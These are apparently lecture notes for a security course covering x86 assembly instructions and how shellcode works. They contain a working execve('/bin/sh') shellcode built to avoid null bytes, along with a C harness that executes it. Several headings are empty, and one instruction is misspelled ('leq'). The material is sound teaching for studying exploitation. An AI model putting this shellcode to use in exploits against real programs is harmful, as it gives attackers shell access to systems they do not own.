Computer and Network Security

Table of Contents

Lecture 6: assembly, shellcode exploits

Assembly

We use x86 assembly, in AT&T notation (personal note: Intel is better for use though).

Low-level, processor-specific symbolic language, directly translated to machine code.

Intructions: simple operations like mov %rax, %rbx (copies value from register rax to register rbx)

Directives: commands for assembler

labels: create symbol at current address (foo: .byte 42 is similar to global char foo = 42) comments: prefixed with #

Endianness: when storing an integer in memory, which byte is stored first

Signed integers:

Common instructions:

examplemeaning
mov src, dstdst = src
xchg dst1, dst2swap dst1 and dst2
push srcstore src on top of stack
pop dstremove value from top of stack and store in dst
add src, dstdst += src
sub src, dstdst -= src
inc dstdst += 1
dec dstdst -= 1
neg dstdst = -dst
cmp src1, src2set flags based on src2-src1
and src, dstdst &= src
or src, dstdst |= src
xor src, dstdst ^= src
not dstdst = ~dst
test src1, src2set flags based on src1 & src2
jmp addrjump to addr
call addrpush return address, call function addr
retpop return address, return there
syscallenter kernel to perform system call (based on registers)
lea src, dstdst = &src (src must be in memory)
nopdo nothing

Conditional branching instructions (prepend ‘n’ to condition for opposite, e.g. jne)

examplemeaning
je addr; jz addrjump if result == 0
jb addrjump if dst < src (unsigned)
ja addrjump if dst > src (unsigned)
jl addrjump if dst < src (signed)
jg addrjump if dst > src (signed)
js addrjump if result < 0 (signed)

Stack:

Shellcode

Assume we:

Where do we point return address?

x86 CPUs don’t distinguish code and data, so if memory permissions allow:

How do we inject code into program?

Injected code must:

User code can’t start program, kernel does that. So tell kernel to do something using a syscall:

Starting a shell:

Shellcode:

.data
.globl shellcode
shellcode:
    jmp code_start
string_addr:
    .ascii "/bin/shNAAAAAAAABBBBBBBB"
code_start:
    leq string_addr(%rip), %rdi     # load the string into %rdi ('path' in execve), offset is negative to avoid null bytes
    xorl %eax, %eax                 # clear %rax without using null bytes
    movb %al, 0x07(%rdi)            # replace "N" in string with null, use %rax to avoid explicit null
    movq %rdi, 0x08(%rdi)           # move program name to argv[0] in execve
    movq %rax, 0x10(%rdi)           # move null to argv[1] in execve, use %rax to avoid explicit null
    leaq 0x08(%rdi), %rsi           # load address of argv into %rsi
    movq %rax, %rdx                 # load null into %rdx ('envp' in execve), use %rax to avoid explicit null
    movb $0x3b, %al                 # load syscall number into %rax, 0x3b is execve, we already xored %rax so other bytes are zero
    syscall                         # perform call 0x3b(%rdi, %rsi, %rdx)
    .byte 0

Testing shellcode:

#include <stdio.h>
int main(int argc, char **argv) {
    extern char shellcode;
    void (*f)(void) = (void (*)(void)) &shellcode; // cast pointer to shellcode to function pointer to 'void shellcode(void)'
    f();
    fprintf(stderr, "this shouldn't print\n");
    return -1;
}

Injecting the shellcode: